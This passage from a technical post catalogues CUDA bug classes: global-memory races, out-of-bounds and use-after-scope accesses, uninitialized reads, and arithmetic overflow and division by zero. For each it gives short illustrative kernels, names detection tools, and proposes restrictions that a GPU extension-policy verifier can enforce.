&lt;p&gt;&lt;strong&gt;Residual gap&lt;/strong&gt;: The verifier guarantees &lt;em&gt;policy&lt;/em&gt; termination, not &lt;em&gt;kernel&lt;/em&gt; termination. If the kernel itself has infinite loops, the policy verifier cannot and should not try to detect this; that's a kernel bug requiring kernel-level tools. This is "bounded overhead = correctness" at its most justified.&lt;/p&gt;




&lt;h3&gt;
  
  
  17) Global-Memory Data Races [Correctness, CPU-shared]
&lt;/h3&gt;

&lt;h4&gt;
  
  
  What it is / why it matters
&lt;/h4&gt;

&lt;p&gt;Races on global memory are a fundamental correctness issue. Unlike shared memory (block-local), global memory is accessible by all threads across all blocks, making races harder to reason about. Many GPU race detectors historically focused on shared memory and ignored global-memory races.&lt;/p&gt;

&lt;h4&gt;
  
  
  Bug example
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight cuda"&gt;&lt;code&gt;&lt;span class="k"&gt;__global__&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="nf"&gt;k&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;g&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;n&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;tid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;blockIdx&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;blockDim&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="n"&gt;threadIdx&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
  &lt;span class="c1"&gt;// Multiple threads may write to same location without sync&lt;/span&gt;
  &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;tid&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="n"&gt;n&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="n"&gt;g&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;tid&lt;/span&gt; &lt;span class="o"&gt;%&lt;/span&gt; &lt;span class="mi"&gt;16&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;+=&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;  &lt;span class="c1"&gt;// race if multiple threads hit same index&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Seen in / checked by
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;ScoRD explicitly argues that many GPU race detectors focus on shared memory and ignore global-memory races.(&lt;a href="https://www.csa.iisc.ac.in/~arkapravab/papers/isca20_ScoRD.pdf" rel="noopener noreferrer"&gt;CSA - IISc Bangalore&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;iGUARD targets races in global memory introduced by advanced CUDA features.(&lt;a href="https://akkamath.github.io/files/SOSP21_iGUARD.pdf" rel="noopener noreferrer"&gt;Aditya K Kamath&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;GKLEE reports global memory races via symbolic exploration.(&lt;a href="https://lingming.cs.illinois.edu/publications/icse2020b.pdf" rel="noopener noreferrer"&gt;Lingming Zhang&lt;/a&gt;)&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Checking approach
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Static verification:&lt;/strong&gt; extend race-freedom proofs to global memory accesses.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Dynamic detection:&lt;/strong&gt; instrument global memory accesses and track conflicting pairs.&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Verification strategy
&lt;/h4&gt;

&lt;p&gt;If policies can write to global memory (maps, counters, logs), require either: (1) warp-uniform single-writer rules, (2) atomic-only helpers, or (3) per-thread/per-warp sharding. Ban unprotected global writes from policies.&lt;/p&gt;

&lt;h4&gt;
  
  
  Verification scope analysis
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Scope &amp;amp; Assurance&lt;/strong&gt;: Combined → Extension-local (C→E) via state isolation, Static-sound. If policies can write arbitrary kernel global memory, race analysis requires knowing kernel access patterns (Combined). However, restricting policies to write only policy-owned objects reduces this to Extension-local, providing strong soundness with isolation, low completeness for kernel-modifying policies (direct kernel writes require Combined analysis).&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Production guarantee&lt;/strong&gt;: Restricting policies to write only policy-owned objects (maps, ringbuffers) enables Extension-local verification: (1) policy-owned objects use known-safe access patterns (atomics, per-warp sharding); (2) the verifier guarantees race-freedom for policy state without inspecting the kernel; (3) ban unprotected global writes from policies. Three safe patterns: warp-uniform single-writer rules, atomic-only helpers, or per-thread/per-warp sharding.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Offline/CI tools&lt;/strong&gt;: ScoRD explicitly argues that many GPU race detectors focus on shared memory and ignore global-memory races, and provides detection with scope awareness; iGUARD targets races in global memory introduced by advanced CUDA features via NVBit instrumentation; GKLEE reports global memory races via symbolic exploration. Note: Compute Sanitizer &lt;code&gt;racecheck&lt;/code&gt; is primarily a shared-memory hazard detector; do not expect it to fully cover global races.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Residual gap&lt;/strong&gt;: Policies needing to modify kernel data structures directly cannot be verified locally; this capability should be restricted or require explicit kernel-side contracts. ScoRD/iGUARD emphasize global-memory races are underdetected by existing tools; state isolation sidesteps this entirely for policy code.&lt;/p&gt;




&lt;h3&gt;
  
  
  18) Memory Safety (Out-of-Bounds / Misaligned / Use-After-Free / Use-After-Scope / Uninitialized) [Safety, CPU-shared]
&lt;/h3&gt;

&lt;h4&gt;
  
  
  What it is / why it matters
&lt;/h4&gt;

&lt;p&gt;Classic memory safety includes both &lt;strong&gt;spatial&lt;/strong&gt; (OOB, misaligned) and &lt;strong&gt;temporal&lt;/strong&gt; (UAF, UAS) violations. Temporal bugs exist on GPUs too: pointers can outlive allocations (host frees while kernel still uses, device-side stack frame returns, etc.).&lt;/p&gt;

&lt;h4&gt;
  
  
  Bug example (OOB)
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight cuda"&gt;&lt;code&gt;&lt;span class="k"&gt;__global__&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="nf"&gt;k&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;float&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;a&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;n&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;tid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;blockIdx&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;blockDim&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="n"&gt;threadIdx&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
  &lt;span class="n"&gt;a&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;tid&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="mi"&gt;1024&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mf"&gt;0.0&lt;/span&gt;&lt;span class="n"&gt;f&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;   &lt;span class="c1"&gt;// OOB write&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Bug example (Use-After-Scope)
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight cuda"&gt;&lt;code&gt;&lt;span class="k"&gt;__device__&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="nf"&gt;bad&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;local&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;8&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
  &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;local&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;          &lt;span class="c1"&gt;// returns pointer to dead stack frame (UAS)&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="k"&gt;__global__&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="nf"&gt;k&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="kt"&gt;int&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;p&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bad&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
  &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;x&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;p&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;          &lt;span class="c1"&gt;// UAS read&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Seen in / checked by
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;Compute Sanitizer &lt;code&gt;memcheck&lt;/code&gt; precisely detects OOB/misaligned accesses (and can detect memory leaks).(&lt;a href="https://docs.nvidia.com/compute-sanitizer/ComputeSanitizer/index.html" rel="noopener noreferrer"&gt;NVIDIA Docs&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;Oclgrind reports invalid memory accesses in its simulator.(&lt;a href="https://github.com/jrprice/Oclgrind" rel="noopener noreferrer"&gt;GitHub&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;ESBMC-GPU checks pointer safety and array bounds as part of its model checking.(&lt;a href="https://github.com/ssvlab/esbmc-gpu" rel="noopener noreferrer"&gt;GitHub&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;GKLEE's evaluation includes out-of-bounds global memory accesses as error cases.(&lt;a href="https://lingming.cs.illinois.edu/publications/icse2020b.pdf" rel="noopener noreferrer"&gt;Lingming Zhang&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;Wu et al.: "unauthorized memory access" appears in root-cause characterization.(&lt;a href="https://arxiv.org/pdf/1905.01833" rel="noopener noreferrer"&gt;arXiv&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;cuCatch explicitly targets temporal violations using tagging mechanisms and discusses UAF/UAS detection.(&lt;a href="https://d1qx31qr3h6wln.cloudfront.net/publications/PLDI_2023_cuCatch_2.pdf" rel="noopener noreferrer"&gt;d1qx31qr3h6wln.cloudfront.net&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;Guardian: PTX-level instrumentation + interception to fence illegal memory accesses under GPU sharing.(&lt;a href="https://arxiv.org/pdf/2401.09290" rel="noopener noreferrer"&gt;arXiv&lt;/a&gt;)&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Checking approach
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Bounds-check instrumentation (Guardian/cuCatch-style):&lt;/strong&gt; insert base+bounds checks (or partition-fencing) around loads/stores.(&lt;a href="https://arxiv.org/pdf/2401.09290" rel="noopener noreferrer"&gt;arXiv&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Temporal tagging + runtime checks (cuCatch-style):&lt;/strong&gt; tag allocations and validate before deref.(&lt;a href="https://d1qx31qr3h6wln.cloudfront.net/publications/PLDI_2023_cuCatch_2.pdf" rel="noopener noreferrer"&gt;d1qx31qr3h6wln.cloudfront.net&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Static verification (ESBMC-GPU):&lt;/strong&gt; model checking for pointer safety and array bounds.(&lt;a href="https://github.com/ssvlab/esbmc-gpu" rel="noopener noreferrer"&gt;GitHub&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;PTX-level instrumentation (Guardian-style):&lt;/strong&gt; insert bounds checks and interception to fence illegal accesses.(&lt;a href="https://arxiv.org/pdf/2401.09290" rel="noopener noreferrer"&gt;arXiv&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Tagging mechanisms (cuCatch-style):&lt;/strong&gt; track allocation ownership and validate access rights.(&lt;a href="https://d1qx31qr3h6wln.cloudfront.net/publications/PLDI_2023_cuCatch_2.pdf" rel="noopener noreferrer"&gt;d1qx31qr3h6wln.cloudfront.net&lt;/a&gt;)&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Verification strategy
&lt;/h4&gt;

&lt;p&gt;This is the "classic verifier" portion: keep eBPF-like pointer tracking, bounds checks, and restricted helpers. Easiest for policies is to &lt;strong&gt;ban arbitrary pointer dereferences&lt;/strong&gt; and force all memory access through safe helpers (maps/ringbuffers). Ideally: policies cannot allocate/free; all policy-visible objects are managed by the extension runtime and remain valid across policy execution (no UAF/UAS by construction). Also add a testing story: run policy-enabled kernels under Compute Sanitizer memcheck in CI for regression.&lt;/p&gt;

&lt;h4&gt;
  
  
  Verification scope analysis
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Scope &amp;amp; Assurance&lt;/strong&gt;: Extension-local (E) for policy memory. Static-sound for spatial safety (helper-only access with tracked bounds); By-construction for temporal safety (runtime-managed objects, no policy malloc/free). Strong soundness with low completeness (raw pointer arithmetic rejected).&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Production guarantee&lt;/strong&gt;: The eBPF approach: (1) ban arbitrary pointer dereferencing; (2) all memory access through verified helpers (map lookup, ringbuffer write); (3) verifier tracks pointer provenance and bounds; (4) policy-visible objects are runtime-managed (no policy malloc/free): UAF/UAS impossible by construction because objects remain valid for the policy's lifetime. This provides strong memory safety for policy code without analyzing the kernel.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Offline/CI tools&lt;/strong&gt;: Compute Sanitizer &lt;code&gt;memcheck&lt;/code&gt; precisely detects OOB/misaligned accesses and memory leaks; cuCatch explicitly targets temporal violations using tagged base&amp;amp;bounds mechanisms and discusses UAF/UAS detection (some deterministic, some probabilistic); ESBMC-GPU checks pointer safety and array bounds via bounded model checking; GKLEE's evaluation includes out-of-bounds global memory accesses as error cases; Wu et al. characterize "unauthorized memory access" in their root-cause analysis; Guardian provides PTX-level instrumentation + interception for multi-tenant memory isolation.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Residual gap&lt;/strong&gt;: Policy memory safety doesn't protect against &lt;em&gt;kernel&lt;/em&gt; bugs. For multi-tenant fault isolation in spatial sharing (streams/MPS), Guardian-style PTX instrumentation or hardware isolation is needed to prevent one tenant's OOB from crashing others: policy verification alone is insufficient for system-wide isolation.&lt;/p&gt;

&lt;h4&gt;
  
  
  Multi-tenant implications
&lt;/h4&gt;

&lt;p&gt;In spatial sharing (streams/MPS), kernels share a GPU address space. An OOB access by one application can crash other co-running applications (fault isolation issue). Guardian's motivation explicitly calls out this problem and designs PTX-level fencing + interception as a fix.(&lt;a href="https://arxiv.org/pdf/2401.09290" rel="noopener noreferrer"&gt;arXiv&lt;/a&gt;) This directly supports the "availability is correctness" story: if policies run in privileged/shared contexts, you must prevent policy code from generating OOB accesses. Either: (a) only allow map helpers (no raw memory), or (b) instrument policy memory ops with bounds checks (Guardian-style PTX rewriting).&lt;/p&gt;

&lt;h4&gt;
  
  
  Bug example (multi-tenant OOB, conceptual)
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight cuda"&gt;&lt;code&gt;&lt;span class="c1"&gt;// Tenant A kernel writes OOB and corrupts Tenant B memory in same context.&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Bug example (Uninitialized Memory)
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight cuda"&gt;&lt;code&gt;&lt;span class="k"&gt;__global__&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="nf"&gt;k&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;float&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;out&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;float&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;in&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;n&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;tid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;blockIdx&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;blockDim&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="n"&gt;threadIdx&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
  &lt;span class="c1"&gt;// 'in' was cudaMalloc'd but never initialized or memset&lt;/span&gt;
  &lt;span class="n"&gt;out&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;tid&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;in&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;tid&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="mf"&gt;2.0&lt;/span&gt;&lt;span class="n"&gt;f&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;  &lt;span class="c1"&gt;// reading uninitialized memory&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Uninitialized Memory: additional notes
&lt;/h4&gt;

&lt;p&gt;Accessing device global memory without initialization leads to nondeterministic behavior. This is a frequent source of heisenbugs because GPU concurrency amplifies nondeterminism. Compute Sanitizer &lt;code&gt;initcheck&lt;/code&gt; reports cases where device global memory is accessed without being initialized.(&lt;a href="https://docs.nvidia.com/compute-sanitizer/ComputeSanitizer/index.html" rel="noopener noreferrer"&gt;NVIDIA Docs&lt;/a&gt;) For policies, require explicit initialization semantics (e.g., map lookup returns "not found" unless initialized; forbid reading uninitialized slots).&lt;/p&gt;




&lt;h3&gt;
  
  
  19) Arithmetic Errors (overflow, division by zero) [Correctness/Safety, CPU-shared]
&lt;/h3&gt;

&lt;h4&gt;
  
  
  What it is / why it matters
&lt;/h4&gt;

&lt;p&gt;Arithmetic errors can corrupt keys/indices and cascade into memory safety/perf disasters.&lt;/p&gt;

&lt;h4&gt;
  
  
  Bug example
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight cuda"&gt;&lt;code&gt;&lt;span class="k"&gt;__global__&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="nf"&gt;k&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;out&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;in&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;divisor&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;tid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;blockIdx&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;blockDim&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="n"&gt;threadIdx&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
  &lt;span class="n"&gt;out&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;tid&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;in&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;tid&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;/&lt;/span&gt; &lt;span class="n"&gt;divisor&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;  &lt;span class="c1"&gt;// div-by-zero if divisor == 0&lt;/span&gt;

  &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;idx&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;tid&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="mi"&gt;1000000&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;       &lt;span class="c1"&gt;// overflow for large tid&lt;/span&gt;
  &lt;span class="n"&gt;out&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;idx&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;                  &lt;span class="c1"&gt;// corrupted index =&amp;gt; OOB&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Seen in / checked by
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;ESBMC-GPU explicitly lists arithmetic overflow and division-by-zero among the properties it checks for CUDA programs (alongside races/deadlocks/bounds).(&lt;a href="https://github.com/ssvlab/esbmc-gpu" rel="noopener noreferrer"&gt;GitHub&lt;/a&gt;)&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Checking approach
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Model checking (ESBMC-GPU):&lt;/strong&gt; static verification of arithmetic properties.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Lightweight runtime checks:&lt;/strong&gt; guard div/mod operations.&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Verification strategy
&lt;/h4&gt;

&lt;p&gt;Optional but reviewer-friendly: add lightweight verifier checks for div-by-zero and dangerous shifts, and constrain pointer arithmetic (already typical in eBPF verifiers). For "perf correctness," overflow in index computations is a common hidden cause of random/uncoalesced patterns.&lt;/p&gt;

&lt;h4&gt;
  
  
  Verification scope analysis
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Scope &amp;amp; Assurance&lt;/strong&gt;: Extension-local (E), Static-sound. Arithmetic errors depend only on the policy's operations and input value ranges, providing strong soundness via range analysis with medium completeness (complex arithmetic may require explicit assertions).&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Production guarantee&lt;/strong&gt;: The verifier performs lightweight static checks: (1) division: require static proof that divisor ≠ 0, or insert runtime guards; (2) overflow: use saturating arithmetic, or prove bounds on operands; (3) dangerous shifts: validate shift amounts; (4) index arithmetic: track value ranges to catch OOB before memory access. This is already typical in eBPF verifiers and adds minimal overhead to policy verification.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Offline/CI tools&lt;/strong&gt;: ESBMC-GPU explicitly lists arithmetic overflow and division-by-zero among the properties it checks for CUDA programs (alongside races/deadlocks/bounds) via bounded model checking.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Residual gap&lt;/strong&gt;: Policies with complex arithmetic that happens to be safe may need explicit assertions or be conservatively rejected. Cascade risk: arithmetic errors often cascade into memory safety bugs (corrupted indices → OOB) or performance bugs (overflow in index computations causing random/uncoalesced patterns). The verifier should track value ranges through index computations proactively to catch these before they become downstream violations.&lt;/p&gt;




&lt;h3&gt;
  
  
  Summary: Improper Synchronization as a Root-Cause Category (Wu et al.'s Three-Way Taxonomy)
&lt;/h3&gt;

&lt;p&gt;Wu et al.'s empirical study explicitly groups CUDA-specific synchronization issues into three concrete bug types: &lt;strong&gt;data race&lt;/strong&gt;, &lt;strong&gt;barrier divergence&lt;/strong&gt;, and &lt;strong&gt;redundant barrier functions&lt;/strong&gt;. They also highlight that these often manifest as inferior performance and flaky tests. Simulee is used to find these categories in real projects.(&lt;a href="https://arxiv.org/pdf/1905.01833" rel="noopener noreferrer"&gt;arXiv&lt;/a&gt;)&lt;/p&gt;

&lt;p&gt;This is exactly the "verification story" hook: a GPU extension verifier can claim that policy code cannot introduce these synchronization root causes because:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;barriers are only allowed at provably uniform control flow points,&lt;/li&gt;
&lt;li&gt;warp-uniform side effects enforced,&lt;/li&gt;
&lt;li&gt;bounded helper calls,&lt;/li&gt;
&lt;li&gt;and a restricted memory model for policies.&lt;/li&gt;
&lt;/ul&gt;




&lt;h3&gt;
  
  
  Summary: Verification Scope and Assurance Types
&lt;/h3&gt;

&lt;p&gt;The verification scope and assurance type dimensions reveal crucial insights for GPU extension framework design.&lt;/p&gt;

&lt;h4&gt;
  
  
  By Verification Scope
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Extension-local (E): 14 of 19 classes:&lt;/strong&gt;&lt;br&gt;
Bugs #1, #2, #4, #6, #7, #10, #11, #12, #15, #16, #18, #19 can be eliminated purely by restricting policy code, without inspecting the host kernel. Additionally, bugs #3, #5, #14, #17 can be &lt;strong&gt;reduced from Combined to Extension-local&lt;/strong&gt; through state isolation.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Combined (C): 2 classes requiring contracts:&lt;/strong&gt;&lt;br&gt;
Bugs #8 (block-size dependence) and #9 (launch config assumptions) fundamentally depend on kernel launch parameters. These require contract-based validation at attach time.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Host+Device (H): 1 class requiring host-side tools:&lt;/strong&gt;&lt;br&gt;
Bug #13 (host↔device async races) cannot be addressed by device-side verification. Requires CuSan/TSan and careful API design.&lt;/p&gt;

&lt;h4&gt;
  
  
  By Assurance Type
&lt;/h4&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Assurance Type&lt;/th&gt;
&lt;th&gt;Bug Classes&lt;/th&gt;
&lt;th&gt;Soundness&lt;/th&gt;
&lt;th&gt;Completeness&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
